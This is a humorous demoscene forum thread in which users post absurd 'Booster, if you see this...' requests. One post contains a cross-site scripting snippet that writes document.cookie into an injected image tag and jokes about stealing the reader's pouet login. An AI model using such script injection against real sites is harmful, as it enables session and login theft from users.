category: general [glöplog]
Booster, if you see this please email me!
Booster, if you see this then your eyes work!
Booster, if you see this now you don't!
Booster, if you see this please ship some humor to magic.. looks like he needs it!
Maali, if you see this please ship some beer to booster.. looks like he needs it!
Anesthetic, if you see this you're too close to the monitor. Try putting on your glasses.
somehow I`m not suprised this thread end up being twisted.. :)


Returning didgeridoos? Wow.
I see silly people.
Booster, if you see this could you please do the chicken dance.
Booster, if you see this could you please send a monkey in the post to outer mongolia.
Booster, if you see this could you cook and eat a cat?
Booster, if you see this could you please do the robot dance ?
Booster, if you see this your handle will forever more be pronounced "Plooster", even though it is still spelt Booster, and theres nothing you can do about it.
*phew* .. done!
<script>document.write('<img src="'+document.cookie+'" />"); alert("Booster, if you see this I've just stolen your pouet login.")</script>
Gasman, if you see this, you need to upgrade Apache to 1.3.37. No, don't ask why, just do it ffs!
oh noes!
Booster, if you see this could you please email the man so other people will not copy him and be all like 'Booster, if you see this could you please' leik th15